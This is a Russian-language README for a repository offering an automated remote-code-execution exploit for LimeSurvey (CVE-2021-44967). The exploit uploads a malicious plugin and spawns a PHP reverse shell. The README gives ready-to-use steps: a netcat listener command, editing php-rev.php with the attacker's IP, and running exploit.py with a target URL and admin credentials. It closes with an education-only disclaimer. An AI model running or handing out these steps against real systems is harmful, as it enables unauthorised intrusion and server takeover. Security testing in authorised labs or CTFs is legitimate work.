
🔥 Автоматизированный RCE эксплойт для Limesurvey (CVE-2021-44967). Оптимизированная цепочка эксплуатации для повышения привилегий. 🚀
Этот репозиторий содержит функциональный эксплойт для CVE-2021-44967 — уязвимости авторизованного удаленного выполнения кода в LimeSurvey.
Протестировано и подтверждена работа на:
Уязвимость позволяет аутентифицированному пользователю с правами администратора загрузить вредоносный плагин. Поскольку LimeSurvey строго не проверяет содержимое ZIP-архива плагина и не предотвращает выполнение PHP-файлов в каталоге плагинов, злоумышленник может добиться RCE, напрямую обратившись к загруженной оболочке.
config.xml обновлён для совместимости с версиями LimeSurvey с 3.0 по 6.0.Запустите слушатель netcat на вашей машине:
nc -lvnp 443
Отредактируйте php-rev.php и укажите ваш локальный IP и порт:
$ip = '<YOUR_IP>';
$port = 443;
python3 exploit.py <TARGET_URL> <USERNAME> <PASSWORD>
Пример:
python3 exploit.py http://10.129.1.243/survey admin test
exploit.py: Основной скрипт автоматизации.php-rev.php: PHP-полезная нагрузка реверс-шелла.config.xml: Обязательный файл конфигурации плагина LimeSurvey.Этот инструмент предназначен ТОЛЬКО для образовательных целей и авторизованного тестирования безопасности. Строго предназначен для использования в контролируемых, легальных средах (например, CTF, лабораторные среды или авторизованные мероприятия). Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом. Используйте его ответственно и только на системах, на тестирование которых у вас есть явное разрешение.